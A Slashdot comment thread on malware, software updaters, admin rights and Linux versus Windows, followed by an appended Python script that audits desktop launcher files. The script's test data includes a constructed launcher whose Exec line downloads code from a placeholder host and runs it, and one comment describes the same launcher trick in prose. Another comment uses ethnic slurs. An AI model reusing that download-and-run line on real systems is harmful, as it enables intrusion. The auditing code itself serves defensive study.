      But really, let's return to the original point. Typical malware infections aren't about the user trying to get their hands on some software. They're about compromised web sites serving up content that looks remarkably like legitimate OS security interfaces, which then tell the user they're infected and tell them where to click to perform a security scan. The user clicks, the user infects the PC. Much of this doesn't rely on OS or browser vulnerabilities, though they may be exploited as well as the social engineering.

      The original comment I replied to told users "two simple things": click the updates button when updates happen and don't download anything. My point remains that getting users to understand and abide by those rules isn't any more practical on a non-Windows platform than it is on a Windows platform. "You told me update when it says update, so I figured scan when it says scan is the same thing." That's what you'll get. By definition, with social engineering the user is the vulnerability. Changing time zone, clothing style, or operating system won't change that.

      --
      "Oh no... he found the .sig setting."
    54. Re:The Game of Catchup by Waccoon · · Score: 1

      Blame Sun and Adobe for not having autoupdaters like Chrome does for Flash.

      I've used Autoruns to try to disable anything from Adobe from running on my computer when I start it. Yet, every time there's a Flash update, I get a pop-up at system boot telling me to update. I've dug through the registry, the startup menu, services, disabled it in IE... everything... and I can't figure out how it keeps running. Flash needs admin access to install. Is it using some kind of root hack to make sure the updater runs?

      I'm not sure why you're saying Flash doesn't have an auto-update, because I have it, and I can't find any imaginable way to shut it off!

    55. Re:The Game of Catchup by fast+turtle · · Score: 1

      Buzz!! Turn in your geek card as both Java and Adobe have autoupdaters. The problem is that both of them require admin rights to even run. Admin rights are fine for the installer but not the damn updater which should be just a simple downloader but no, both of them believe they're the only software that should be running on your computer, so want admin rights to fuck things up.

      On my home network, I've configured all users as limited accounts w/o rights to install any software. I've also set a strong admin password and I don't install Java as we have no need for it. In regards to Flash and Reader though, I'm stuck because we have PDF docs that simply don't work with any of the others (depend on the latest formats) and Flash is used by too many games. At least I've managed to switch them to FF 4 with NoScript and have set it to block all plug-ins other than for specific whitelisted sites.

      --
      Mod me up/Mod me down: I wont frown as I've no crown
    56. Re:The Game of Catchup by h4rr4r · · Score: 1

      Close but dependencies are not shared, so you still get multiple out of date libs.

    57. Re:The Game of Catchup by h4rr4r · · Score: 3, Interesting

      Which drivers?
      Name some specifics you troll.

      Also 1 in 14 downloads on windows is malware, that is sure going to be breaking machines more than every 6 months.

      Windows will be usable when it has lsof, can replace in use files, and in general starts acting like a multi-user OS.

    58. Re:The Game of Catchup by h4rr4r · · Score: 1

      Save yourself the drive, set up a FOG server. Could be a netbook with an external USB hard drive. The machines are set to attempt PXE boot and if scheduled to get a new image they do.

    59. Re:The Game of Catchup by h4rr4r · · Score: 2

      My IT dept is happy to do such a thing. You just have to sign a little form that lets you know under that setup no troubleshooting nor assistance can be given and the only support in case of issues is to reimage the machine. In reality support is given, but not to the degree a regular user gets and if you lose data TFB.

    60. Re:The Game of Catchup by Anonymous Coward · · Score: 0

      Actually the exploit is Java based, it works on ALL browsers, not just IE.

      It also replaces MS Security Essentials with its fake software.

      It's pretty widespread; the symptoms are ever changing now. Not only does it hijack browsers and give you fake hard drive errors, it also opens all Windows Firewall ports.

    61. Re:The Game of Catchup by h4rr4r · · Score: 1

      Inept or stuck supporting applications and/or websites that require IE6?

      The place I work at just moved the majority of the Windows users to IE8; they had been on IE6. This is because a client we work for requires we use some of their in-house software that actually uses the Trident rendering engine and until a couple months ago only worked with IE6.

    62. Re:The Game of Catchup by jimicus · · Score: 2

      Windows actually has most of the features necessary to make it a lot more secure. The problem is that very few people use them (hell, many people don't even know they exist) because of the inconvenience such features would incur. To make life easier, Microsoft even released a tool for XP and Vista called SteadyState.

      Windows 7 has most of the same features baked in but I reckon it's a step back because SteadyState provided a nice, unified, idiotproof GUI for setting the system up in this fashion that didn't require you to step through several hundred irrelevant options. That aspect of SteadyState hasn't been baked into Windows 7.

      I don't think Linux is the solution it's sometimes painted as for a number of reasons:

      1. Many pieces of malware don't depend on OS behaviour to spread, they depend on human behaviour. Which you can't patch by upgrading the OS their PC runs.
      2. As Linux distributions mature, they're appealing to people who don't understand (and don't wish to understand) any of the underlying technology. Case in point: the number of people in any Linux discussion who say "I don't like SuSE because it didn't set up (whatever), but Ubuntu did". Even though the (whatever) in question invariably has more to do with underlying tools common to any Linux distribution, and it's just that Ubuntu ships with a configuration that suits the user better. It would have been considerably less upheaval to learn how to configure the underlying tool than to wipe and rebuild, but that would require learning beyond what the GUI provides.

      It's only a matter of time before someone puts together a Linux distribution that uses something like an SQLite database to store configuration and includes an application that automagically generates appropriate config files at boot - and therefore such config files must be treated as readonly because they'll be wiped at boot. I already know of one embedded product that does almost exactly this.

    63. Re:The Game of Catchup by jimicus · · Score: 1

      Solution to 1 and 2: Statically-linked binaries.

      In fact, I'm pretty sure it's a solution to 3 as well. Does the ELF format even include a specification for signed binaries?

      You've touched on something that will help with 4. Mounting /home with noexec is the final piece of the puzzle.

    64. Re:The Game of Catchup by jimicus · · Score: 3, Insightful

      The problem you describe isn't exclusive to the Linux kernel by any means. I have seen more-or-less the same sequence appear in all sorts of places - OpenLDAP's done it with multimaster replication (and still is doing it with server-side sorts), FreeBSD has done it with journalled filesystems, The Gimp is doing it with CMYK support and I don't doubt there are other pieces of software doing the same thing.

      The sequence of events generally goes something like this:

      1. A specific F/OSS product is missing a particular feature. It may or may not be particularly important, but it's missing for whatever reason.
      2. That feature starts to appear in other software. Maybe commercial software, maybe other free software. In any case, it starts to appear. The person(s) behind the product being discussed don't think it's particularly important and make the conscious decision to ignore it.
      3. It becomes apparent that the feature in question is actually quite useful. But it still doesn't get implemented because that would mean the person who made the original decision not to would have to admit they were wrong - something that many people find very difficult. Anyone questioning this is told "submit a patch" - but it's far more likely they'll just use something else, something that does meet their needs.
      4. It becomes apparent that the feature in question is not useful, it's essential. Still it doesn't get implemented - if anything, the person who decided not to implement it will become ever more vocal in their criticism of the feature. I have actually seen people put together stonking great essays on how the feature is unnecessary - maybe even harmful - to back up this view. It's far too late, of course - by this time it's crystal clear to any impartial observer that the original decision was poor, and anyone still defending it is deluded.
      5. A patch to implement the feature is accepted and the feature is announced with much fanfare at the next major release. No mention of the previous view is made.

      (WTF slashdot? No ordered lists?)

    65. Re:The Game of Catchup by Oligonicella · · Score: 1

      Thank you for this illustrative example of exactly why Linux is making such inroads into everyday use. You, for most of the public, are the face of Linux.

    66. Re:The Game of Catchup by Oligonicella · · Score: 1

      Acrobat Reader is easy. Replace it with a clone. They don't have the specific attack points. Works fine for me, even tested it against a known pdf infection.

    67. Re:The Game of Catchup by BrokenHalo · · Score: 1

      I find it incredible to see how many mission-critical applications are still entrusted to Windows. For instance, I'm sure I'm not alone in having seen BSODs on every screen at an airport or on an ATM. That doesn't (necessarily) mean it's actually insecure, but it does mean the software is still not stable enough to run anything important.

      However, to briefly digress to the actual topic of the thread: If a bunch of guys are unprincipled enough to infect people's machines with malware, why (oh why) are some people so damn fucking naive as to pay out a ransom to them for some dubious "fix"?

    68. Re:The Game of Catchup by snemarch · · Score: 1

      Yup, I use Foxit Reader on my Windows boxes - it's slow for complex renders though, I wish Sumatra was more stable. But AR is the default used by the masses, and it may be mandated by corporate IT policies.

      --
      Coffee-driven development.
    69. Re:The Game of Catchup by Anonymous Coward · · Score: 0

      I set ALL my users to be normal users. I tell them the admin accounts (if they ask which they rarely do). Including myself. It cuts many viri off at the knees. Many expect to be an admin...

      A quick users account cleanup is way easier than full on computer reinstall. I tell people why I do it and they instantly go 'hey that is a good idea'.

      Run that way yourself. You still have admin if you need it. You will find you rarely do. Unless you develop programs.

    70. Re:The Game of Catchup by Khyber · · Score: 1

      "I run FireFox even though it's technically less secure"

      NoScript and ABP are all I need. Haven't been hit by shit, EVER.

      --
      Still waiting on Serviscope_minor to wake up to fucking reality and realize that Jessica Price isn't going to fuck him.
    71. Re:The Game of Catchup by LurkerXXX · · Score: 1

      We wanted some storage for some images we need. About 1 TB.

      They charged us $50K to give us 1TB of storage in their SAN.

      When we download from their storage server, the best any desktop can do is get 0.15 MB per second. It's been a year and they can't make it do any better, so we host it ourselves locally (encrypted far better than theirs I'm sure).

      Inept.

    72. Re:The Game of Catchup by Khyber · · Score: 1

      "IE 9 has the most security out of box than any browser to date"

      Nope. Lynx. You can't infect something that doesn't support your attack vector, and never will because it's simply not capable of using them in the first place.

      Notice you didn't say "THAN ANY OTHER WINDOWS BROWSER TO DATE."

      --
      Still waiting on Serviscope_minor to wake up to fucking reality and realize that Jessica Price isn't going to fuck him.
    73. Re:The Game of Catchup by LurkerXXX · · Score: 1

      Oh, and did I mention the default domain policy leaves Autoplay on? And in 2011, their storage available for your own working files is... 10 MB.

      Inept.

    74. Re:The Game of Catchup by Khyber · · Score: 1

      I love how you say it works on all browsers, implying that all browsers are graphical and not text-based.

      No wonder you posted as AC, with as wrong as you often are!

      --
      Still waiting on Serviscope_minor to wake up to fucking reality and realize that Jessica Price isn't going to fuck him.
    75. Re:The Game of Catchup by h4rr4r · · Score: 1

      Yeah that is inept.

      I can get you 1TB, on 10GbE for less than that, so long as you are ok sharing the backing disks, which are only 10k rpm. Obviously you don't get your own sysadmin or anything fancy for those prices. Over iscsi so you can use whatever encryption you want, we are just presenting a raw 1TB target. Or for another reasonable fee we do all the mounting and encryption as well, still ain't gonna get $50k.
      If you don't have much churn backups are included. If you are replacing the whole 1TB daily it could get expensive to backup, add in maybe $10k worst case. Still not hitting $50k.

      Maybe that much if you want your own set of disks, churn the whole 1TB per day and need them to be 15k. Comes with the 10GbE cards for the current servers your department owns. Yearly fee is going to be near nothing as well as long as you are ok sharing disks in the future.

      Yet, still I have internal users bitch about my pricing.
      Which is funny when they try to outsource stuff and end up coming back and paying me what I asked for in the first place.

    76. Re:The Game of Catchup by snemarch · · Score: 1

      All it takes is one whitelisted domain being hacked or DNS poisoned, and you're outta luck - FF has no sandboxing and it doesn't drop unneeded privileges. At least it supports DEP and ASLR, but still - it's a lot less than IE.

      Yes, I do NoScript and ABP as well and try to be diligent about what I allow, but that doesn't mean I'm not aware of the risks.

      --
      Coffee-driven development.
    77. Re:The Game of Catchup by L0rdJedi · · Score: 1

      Except that it won't: The user'd have to:
      1. Click on the fake link.
      2. Accept the file download(FF at least asks you to save or cancel with any download)
      3. Right-click the saved file, click properties, and check the 'make executable' button.
      4. Double click on the application, and then enter your password.

      I think that'd take some doing to convince the user to do all that, especially when the user's used to clicking on the Main Menu -> System -> Update or w/e.

      You think it takes something special other than "Now you're going to need to do a few things to get these updates to install because they're out of bandwidth updates. Just follow these simple steps and everything will be fine and you'll be completely secure".

      It doesn't take much to make the average user think that what they're doing is going to completely secure their system.

    78. Re:The Game of Catchup by L0rdJedi · · Score: 1

      And then there'll be that one package that people want that isn't available in the repository. Then they'll have to go out and find it somewhere else. That's where the trouble starts.

    79. Re:The Game of Catchup by LurkerXXX · · Score: 1

      I wish they'd hire you to take over here. Or anyone competent. They have a handful of folks who know what they are doing, but not many in a huge department that always wants to include 6 staff members in any meeting only really needing 1, so they can bill more hours.

      At least they are sometimes amusing. When I dropped off a SATA drive with some SQL databases for them to host for another project, I hung around for a few minutes to make sure they could import the data ok. I turned around for a minute and when I turned back their 'IT specialist' was trying to plug the 4 prong power plug for a floppy drive into the data socket of the SATA drive. Scared me a bit, but he stopped after I yelled.

    80. Re:The Game of Catchup by h4rr4r · · Score: 1

      Sounds like inflated head count troubles. IT manager has too many bodies so he needs to find a way to pay them. That is when you get extra bodies in meetings and crazy prices for low speed storage.

    81. Re:The Game of Catchup by ternarybit · · Score: 1

      Seriously. Combofix run from Safe Mode with Command Prompt = 99% of viruses removed. Run a full MBAM scan in normal mode and sfc /scannow if you're really paranoid. Move on with your life.

    82. Re:The Game of Catchup by L0rdJedi · · Score: 1

      The only group that gets that privilege at my job are the engineers and that's only because their boss is above my boss.

      FYI, it's probably not the IT department that doesn't think that other software is essential. It's probably the CTO/CIO/whoever's in charge of spending money. That's the guy that IT always has to get approval from in order to spend money on anything. Getting approval for MS Office is relatively easy since everyone uses it. Getting approval for Photoshop is difficult since only 1 or 2 people (where I'm at) use it.

      Installing the rest of that stuff wouldn't be a big deal (we keep a software inventory of everything installed on every machine). The problem of course comes when you see a new program that you want, which probably happens at least once a week. Then you'd have to tell IT that you're installing it (if you don't have admin and you're asking for a program to be installed, you're effectively telling IT you want it). You don't want to have to do that. Even though if you end up having a problem with something you'll be calling IT to troubleshoot it (and you're also assuming they know how to use every damn program you have installed) you don't want to have to bother with letting them know when you're installing every media player under the sun (you need WinAmp and VLC?)

    83. Re:The Game of Catchup by L0rdJedi · · Score: 1

      This is effectively what we do with guys like that. We let them have at it. Then, when they call because something weird isn't working right, we tell them we don't know what's wrong and that we need to look into it. I'll spend less than 30 mins on the problem before getting another call telling me they figured out what's wrong and that it's working again. This happens a couple of times over a few months and then eventually something gets really hosed and their system gets really slow. At that point, we simply tell them that it would take a week or more to find the cause and that we'd still have to rebuild the computer from scratch. So they can give us 2 hours to rebuild their machine or they can just deal with it. If it's not a showstopper (it hardly ever is) they simply deal with it.

      I have had this happen on multiple occasions with the same guy. It invariably comes down to either file system corruption or registry corruption. In any case, I really don't care because I have far better things to do than figure out what happened in the 6 months between when I gave him the fully functioning machine and when the problem appeared (which is usually something that showed up a week or two before I get the call, it's just "gotten in the way" now).

    84. Re:The Game of Catchup by metacell · · Score: 1

      Whoosh?

    85. Re:The Game of Catchup by chromatix · · Score: 1

      Sun - or rather Oracle these days - provide an autoupdater with every version of Java 6 for Windows that I've seen. It even seems to work.

      Adobe also provide an auto-updater with recent versions of Flash Player for Windows. There might also be a periodic update check for Reader, although I suspect this kicks in only once you launch it (which for many people might be very rarely, so a malfile might still open in an unpatched version anyway).

      Ubuntu also auto-updates Flash Player and Reader if you installed them through the package system. It's just a piggy-back on an existing mechanism that works.

      Of course, if people are still coasting along on versions prior to the introduction of auto-update, or have turned it off, or habitually hit Cancel when a prompt-to-update appears "because it's too much trouble right now", they have only themselves to blame.

      --
      --- The key to knowledge is not to rely on people to teach you it ---
    86. Re:The Game of Catchup by metacell · · Score: 1

      Windows Update can only be used for a small selection of system software from Microsoft. It can't be used to download third-party software.

      Apt (the packaging tool used by Debian, Ubuntu and others) can be used for both the thousands of software packages provided in the distribution's repository, and for software packages from third-party repositories. Just add a new software source in your package manager, and the third-party packages will be updated just like all the other packages in your system.

      In other words, Linux provides one single update mechanism for all software on a system, which works well in both theory and practice.

    87. Re:The Game of Catchup by Khyber · · Score: 1

      "FF has no sandboxing'

      You mean you don't BY DEFAULT sandbox every non-OS program?

      LOL

      --
      Still waiting on Serviscope_minor to wake up to fucking reality and realize that Jessica Price isn't going to fuck him.
    88. Re:The Game of Catchup by Anonymous Coward · · Score: 0

      Flash and Java both have an autoupdater... it annoys me instead of silently upgrading when I boot my computer.

    89. Re:The Game of Catchup by Xacid · · Score: 1

      Why shoot before getting a chance to receive an answer? It sounds like he's running into some legit issues - ones that should at least be taken somewhat seriously.

      Either:
      a) there's a serious problem here or
      b) he's misinformed/misunderstanding and this would be a ripe opportunity to educate him in a way that's not going to alienate him (as plenty of the *nix gurus like to do from time to time in my experience).

      "can replace in use files" - I'll try to be reasonable here and ask this out of curiosity: I haven't fully used linux in years - are you telling me you can update the kernel live while logged in and without rebooting? If that's the case that's just damned impressive.

    90. Re:The Game of Catchup by MobileTatsu-NJG · · Score: 1

      For instance, I'm sure I'm not alone in having seen BSODs on every screen at an airport or on an ATM. That doesn't (necessarily) mean it's actually insecure, but it does mean the software is still not stable enough to run anything important.

      Uh, no, it means a hardware component failed, and that's not something Linux can defend against, either. Also, nothing about any OS means code written for it (such as the interface for an ATM....) will be bug free. For your point to be valid, you need to point out failures that are clearly the fault of the OS.

      The headline answers your other question.

      --

      "I like to lick butts!" by MobileTatsu-NJG (#32700246) (Score:5, Informative)

    91. Re:The Game of Catchup by Lime+Green+Bowler · · Score: 1

      Back in April I had two people catch the same malware within a week of each other. Very similar to this: +h+s all of the files in the profile user directory so they've got nothing to click on, rewired the registry to trap the launch of executables to call the malware with the executable name as a parameter, presumably so they could "shell" out to whatever you clicked on. Convenient way to re-infect a system. Popups for "Hard drive failing" blah-blah-bitemyass. After fixing the first one, I did the usual: uploaded the exe to VirusTotal for verification then sent the sample file off to "two well known free AV vendors". A week later, the second malware victim pops up. Tested the exe against both free AV packages. Neither complained about the executable. Uploaded it to VirusTotal, which immediately said this file was scanned over a week ago. Malwarebytes, SuperAntiSpyware, Spyware Doctor, Spybot- nobody got it. Then I took the executable to work where Symantec SAV Corporate with up-to-date defs happily scanned right past the malware file without a blink.

      What? Oh yeah, the point. Tell your complainer that even up-to-date software can be as clueless as Sarah Palin. There's no guarantee that something out today will be detected tomorrow.

      --
      "It's a computer. It can do anything. Make it do whatever I want. Use that HTML stuff if you have to." -- anonymous manager

    92. Re:The Game of Catchup by WorBlux · · Score: 1

      3. Not really, a launcher doesn't need to be marked executable in most distros.

    93. Re:The Game of Catchup by cbiltcliffe · · Score: 1

      "can replace in use files" - I'll try to be reasonable here and ask this out of curiosity: I haven't fully used linux in years - are you telling me you can update the kernel live while logged in and without rebooting? If that's the case that's just damned impressive.

      Yes, you can.

      --
      "City hall" in German is "Rathaus" Kinda explains a few things......
    94. Re:The Game of Catchup by WorBlux · · Score: 1

      The userspace is not tied to the kernel. The userspace to kernel api is extremely stable and things are almost never broken. There is really no reason you can't drop in a kernel several versions in either direction with some config changes.

      It's the drivers and internals which can change from release to release, but that has several advantages, not the least of which is the ability to properly fix security bugs, and to only support the most up-to-date interfaces in the kernel, increasing maintainability and reducing total lines of code. Windows XP has to give 4 interfaces for USB devices to make sure nothing breaks; Linux, while it has gone through 4 interfaces, only has to support one. It also allows drivers to share a lot of code and infrastructure, reducing development and maintenance costs for hardware manufacturers. In fact Vista ended up breaking a lot of drivers just because the old interfaces were found to be both insecure and unmaintainable. Just because everyone else does it, doesn't mean it's the Right Thing TM.

    95. Re:The Game of Catchup by RobbieThe1st · · Score: 1

      Uh, what? What sort of file are we talking about that would allow arbitrary code to be run /without/ setting the execute bit?

    96. Re:The Game of Catchup by cbiltcliffe · · Score: 1

      They aren't full-auto, though, and check for updates relatively seldom. And when Joe User sees a "please shutdown your browser to install update" right in the middle of his browsing session, he's going to click "nah, postpone" and forget all about it. Until next time the prompt pops up... in the middle of his browsing session. The Flash updater is notoriously lame, not offering a "retry" button.

      The Flash updater runs at logon. I've never seen it pop up in a browsing session. I've seen it dozens of times pop up when the computer is first turned on. Considering that it takes all of 15 seconds to run, it's hardly excusable to do it later, when it won't even require a reboot at that point.

      --
      "City hall" in German is "Rathaus" Kinda explains a few things......
    97. Re:The Game of Catchup by cbiltcliffe · · Score: 1

      Use process explorer to find the owning process of the updater window. Then, viewing properties of that program will show you the parent process. This might give you a hint as to where it's being started from.

      --
      "City hall" in German is "Rathaus" Kinda explains a few things......
    98. Re:The Game of Catchup by cbiltcliffe · · Score: 1

      , or habitually hit Cancel when a prompt-to-update appears "because it's too much trouble right now", they have only themselves to blame.

      That's nothing. I regularly run across people who cancel out of auto updates because "I think it might be installing a virus."

      W....T....F?

      --
      "City hall" in German is "Rathaus" Kinda explains a few things......
    99. Re:The Game of Catchup by Dwonis · · Score: 1

      Lynx runs on Windows.

    100. Re:The Game of Catchup by hairyfeet · · Score: 1

      Off the top of my head... Nvidia, Realtek, Via, Broadcom, Atheros, and ATI... that enough for you? These are just the ones off the top of my head where an update completely wasted the driver, leaving a broken machine in its wake.

      Frankly I have seen ONE, just one mind you, machine where it was able to go more than a single update without a single driver breaking, and that was a 10 year old Intel box I was getting ready to chunk and decided to try it. I still threw it away BTW, as nobody wants 10 year old junk anymore.

      But I want to thank you, Mr Linux Zealot, thanks for giving a perfect example of why we retailers avoid your product: because if we dare to say anything other than "Gee isn't Linux swell? Why it sure is Biff, and RMS's beard smells like roses!" then we get nothing but vicious hatred, with the words "shill" and "astroturfer" being your nigger or wetback. Anybody that doesn't get in line and follow the "Linux is perfect" meme gets shot down.

      Finally you want some proof, 100% undeniable that my words are true? Will the largest OEM on the planet be good enough for you? Dell is having to run their own repos because if you dare to try to update from Canonical's it breaks the drivers.

      But I'm sure that rather than admit you are wrong and that drivers are a serious problem, you'll instead trot out the trusted Linux TMs, which BTW they've made a site dedicated to the complete bullshit excuses Linux Zealots use to cover up their failings. So let me guess which ones you will use....let's see...how about "Use Distro X" "Works for Me" and "Astroturfer". Any I missed?

      --
      ACs don't waste your time replying, your posts are never seen by me.
    101. Re:The Game of Catchup by snemarch · · Score: 1

      For me it seems to pop up more or less at random - and while it doesn't require an OS reboot, it does require a firefox restart.

      --
      Coffee-driven development.
    102. Re:The Game of Catchup by StuartHankins · · Score: 1

      The unholy software called Flash has the ability to possess the machine, unless you roll a natural 20 to save. Duh.

    103. Re:The Game of Catchup by Khyber · · Score: 1

      Hasn't run on 7x64 for me, yet.

      --
      Still waiting on Serviscope_minor to wake up to fucking reality and realize that Jessica Price isn't going to fuck him.
    104. Re:The Game of Catchup by WorBlux · · Score: 1

      A desktop or menu launcher doesn't need to be marked as executable (for most distros) for it to call any shell command. With it you could call a program with a known vulnerability and deliver the payload to exploit it, or wget or curl a malware Python script, which does not need to be marked executable to execute if you pass the file containing commands as an argument to python.

    105. Re:The Game of Catchup by jsvendsen · · Score: 1

      And therein lies the rub. One dialog pops up, and we expect people to immediately pull the power cord and go rinse off under a hot shower. Another, seemingly identical, dialog pops up, and users are expected to click OK instantly and without question, providing their admin password if needed.

      It's important to realize that without a keen and well honed intuition to tell you what is real and what is scam, something that most computer users will never develop, there is no difference between these two events. What is instantly obvious to you is completely invisible to them because they have no clue about the subtle cues that enable you to accurately classify something as an attempt to trick you. Complicating the matter further is that in all likelihood neither do you. Typically seeing the difference is an entirely subconscious process, making teaching it very hard and understanding the need to teach it perhaps even harder. I mean, it's obvious, right?

    106. Re:The Game of Catchup by RobbieThe1st · · Score: 1

      Hm... Didn't think about that. That needs to be addressed: it should be required to be executable to run code inside, even if that code is being run by an external program. That - if true - needs to be addressed quickly.

    107. Re:The Game of Catchup by Anonymous Coward · · Score: 0

      People are quick to blame IE, Microsoft, antivirus companies, java/flash plugins. Here's an idea for once... how about blaming the ignorant user who wants to click on every link, pop-up ad, every search result and open up every email that they get! People have no common sense anymore. The basic user doesn't care. People think when they have the best security suite, all their security patches, they can do whatever. They believe they are protected to go to any website that they want because they are "fully protected". Wrong. There are a lot of applications that will provide decent protection, but ultimately it is up to the user to practice common sense while browsing.

      And if it comes in through a legitimate site, then blame the owner of the site for not beefing up their security or for posting a malicious link that leads to the malware. Stop harping on security holes in browsers. IE has holes just as firefox and chrome has security holes in their browsers too. Hard to believe but they are there! We will never have a fully secure browser or flash or java plugins primarily because of those people out there who want to exploit technology weakness to make money. It'll never stop. The only way to reduce it is to educate people into smart browsing practices

    108. Re:The Game of Catchup by hairyfeet · · Score: 1

      The problem is nobody cares if the OS won't run which is EXACTLY what you have now! Read my earlier post where I gave a link showing how even Dell, one of the largest OEMs on the planet, has to blow serious cash and man hours maintaining their own repos, because if you try to use Canonical's (or any Linux repos) the drivers break and you end up with a crippled machine. I mean I can make the most secure machine in the world if I make sure to break it so bad the user can't do anything, but do you think anybody would buy it?

      And between 2K/XP to Vista/7 you are talking a combined 14 years of support where those drivers worked just fine, year after year after year. I have NO doubt with the new driver model we will see as long or even longer support, and I can take Vista drivers and drop them straight into Windows 7 with no hassles or recompiles, or forums, or futzing, it all "just works" and continues to work, no matter how many patches I apply.

      Compare this to Linux, where out of the 6 machines I tested (4 desktop and 2 laptops, all with pretty bog standard hardware) what I found was that not a single one survived the updates unscathed. Not a single one. Sound, networking, video, wireless, there was always SOMETHING that didn't survive updates. Was there a simple "update driver" button? A simple way for an average user to easily get the functionality back? Nope, it was back to the forums, for sometimes hours, scouring and trying different "fixes" in a vain attempt to get the hardware functional again. I'm sure you'll agree that for an OS for the masses that is simply unacceptable, especially when Windows 7 is so damned simple and intuitive my 68 year old clueless dad installed it by himself and it took care of everything including finding ALL the drivers and giving him a choice of free or pay AVs. The hardest thing he had was it asked "are you at home or at work?" and that was it.

      So I hope you can see I'm not some troll, I'm a potential customer. I don't like having to shell out $100 a pop for Windows licenses, and would like to be able to offer low cost machines that anybody can afford. But when I can't even guarantee that the machine will be functional in a year, even if the user only follows best practices? I'm sorry but that is simply inexcusable. I sell to normal folks, not nerds or CS grads. They just want to come home, fire up their PC, and do the things normal folks do, Youtube, email, FaceBook. These jobs could be easily done by Linux but as long as Torvalds treats the kernel as his personal playground, as long as a simple update turns into a "Break linux NOW" button almost every single time without fail, as long as the ONLY way to return the machine to a usable state is to trawl some forum (that is if you haven't had the networking broken by the update) where you have to know the exact make, rev, model, etc AND after all that apply a whole bunch of CLI gibberish that the user won't understand and may/may not work? I'm sorry but that is simply not an acceptable product for home users.

      --
      ACs don't waste your time replying, your posts are never seen by me.
    109. Re:The Game of Catchup by Zaiff Urgulbunger · · Score: 1

      Not run it for a few years now, but VMware Workstation used to be "entertaining" on Ubuntu. I was always able to get it to work in the end, but I did kind of "fear" the kernel update, and if I was short of time, I'd put off kernel updates until I knew I had time to fix the problems.

    110. Re:The Game of Catchup by laurelraven · · Score: 1

      I'll give you that Windows Update does not update anything outside of Microsoft products...this is unfortunate, and I agree with you on that.

      As for the updates you do get, my point was that I'd rather not leave it up to the user to remember to update. Further, if I give a user the ability to update with a package manager like Apt, they will also have the rights to install anything they want on the system (providing it is in the repositories). I'm sorry, but I really don't want users doing that; those systems are often shared with others, and the more crap they install on them, the further away those systems get from the corporate image.

      Maybe I'm being a bit paranoid and controlling, but as the system administrator, I want to know what goes on on my network. I'm sure there is a way to do that with Linux, probably even better ways. Unfortunately, they all take time to implement. What I currently have took relatively little of the short time I have to spare.

      --
      RTFA is Known to the State of California to cause cancer.
    111. Re:The Game of Catchup by laurelraven · · Score: 1

      You know, I've been meaning to set something like that up for just that reason. I just haven't had the time yet.

      --
      RTFA is Known to the State of California to cause cancer.
    112. Re:The Game of Catchup by WorBlux · · Score: 1

      The Dell you talk about had a GMA 500 chipset, whose drivers were not in-tree. All of Intel's other graphics chipsets are open drivers and have excellent Linux support (still a few kinks getting worked out on Sandy Bridge though). The problems you talk about, while something you absolutely want to avoid on an OS for general consumers, can be avoided with careful choice of hardware. I have a Samsung N120 without a single closed driver and it works perfectly. If I update the kernel, the drivers upgrade with it. Ubuntu does have an "install additional drivers" GUI that will track down a lot of the drivers.

    113. Re:The Game of Catchup by WorBlux · · Score: 1

      You can alias interpreters on the system to implement that check for you and prompt you whenever the interpreter is opening a non-executable file, but bash itself just considers the file you have a program interpret as just another parameter. You could try to make the desktop environment need execute bits on launchers, but in reality it seems that launchers are interpreted rather than directly executed. Perhaps it could be solved by requiring launchers to be signed by the user or added to a whitelist to run, with the ordinary methods of making launchers automatically signing them, so that random ones off the internet are unlikely to work. It's not technically an exploit, but certainly something where there should be a patch ready to address this if something gets out in the wild that uses this.
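
The launcher problem WorBlux describes in comments 104 and 113 (an Exec= line can hand a non-executable script to an interpreter, run an inline `sh -c` string, or fetch code with wget/curl, and the launcher file itself carries no execute bit), as an added example in Python that is not code from WorBlux, RobbieThe1st or any project. It assumes the desktop environment runs whatever the Exec= key says, the behaviour WorBlux describes, and audits launchers in a directory the user controls. The two launchers it scans are constructed for the demonstration; `example.invalid` is a placeholder host and `/tmp/.p.py` a made-up path.

```python
"""Audit .desktop launchers for Exec= lines that run code no execute bit
protects. Added example, not code posted on this page; the two launchers
it scans are constructed for the demonstration."""
import os
import re
import shlex
import stat
import tempfile

# interpreters that run whatever file they are handed, exec bit or not
INTERPRETERS = {"python", "python2", "python3", "sh", "bash", "dash", "perl", "ruby"}


def parse_exec(desktop_text):
    """Return the Exec= value from the [Desktop Entry] group, or None."""
    in_entry = False
    for line in desktop_text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            in_entry = line == "[Desktop Entry]"
        elif in_entry and line.startswith("Exec="):
            return line[len("Exec="):].strip()
    return None


def audit_exec(exec_line):
    """Findings derived from the Exec= value alone (empty list = nothing stood out)."""
    findings = []
    # shlex approximates the desktop-entry quoting rules closely enough for an audit
    argv = shlex.split(exec_line)
    if not argv:
        return findings
    cmd = os.path.basename(argv[0])
    if cmd in INTERPRETERS:
        if "-c" in argv or "-e" in argv:
            findings.append(f"{cmd} runs an inline command string")
        else:
            # skip options and desktop field codes such as %f or %U
            scripts = [a for a in argv[1:] if not a.startswith(("-", "%"))]
            if scripts:
                findings.append(f"{cmd} is handed {scripts[0]}; its execute bit is never checked")
    if re.search(r"\b(curl|wget)\b", exec_line):
        findings.append("fetches content from the network at launch")
    return findings


def audit_launcher(path):
    """Findings for one launcher file: its own mode bits plus its Exec= line."""
    with open(path, encoding="utf-8") as fh:
        exec_line = parse_exec(fh.read())
    if exec_line is None:
        return ["no Exec= line"]
    findings = []
    if not os.stat(path).st_mode & stat.S_IXUSR:
        findings.append("launcher itself is not executable")
    return findings + audit_exec(exec_line)


# constructed launchers: one ordinary, one of the shape described in the thread
BENIGN = "[Desktop Entry]\nType=Application\nName=Firefox\nExec=firefox %u\n"
HOSTILE = ("[Desktop Entry]\nType=Application\nName=Photos\n"
           "Exec=sh -c \"wget -qO /tmp/.p.py http://example.invalid/p && python3 /tmp/.p.py\"\n")


def demo():
    """Write the two launchers to a scratch directory and audit them."""
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        for name, text, mode in (("firefox.desktop", BENIGN, 0o755),
                                 ("photos.desktop", HOSTILE, 0o644)):
            path = os.path.join(tmp, name)
            with open(path, "w", encoding="utf-8") as fh:
                fh.write(text)
            os.chmod(path, mode)
            results[name] = audit_launcher(path)
    return results


if __name__ == "__main__":
    for name, findings in demo().items():
        print(name, findings or ["ok"])
```

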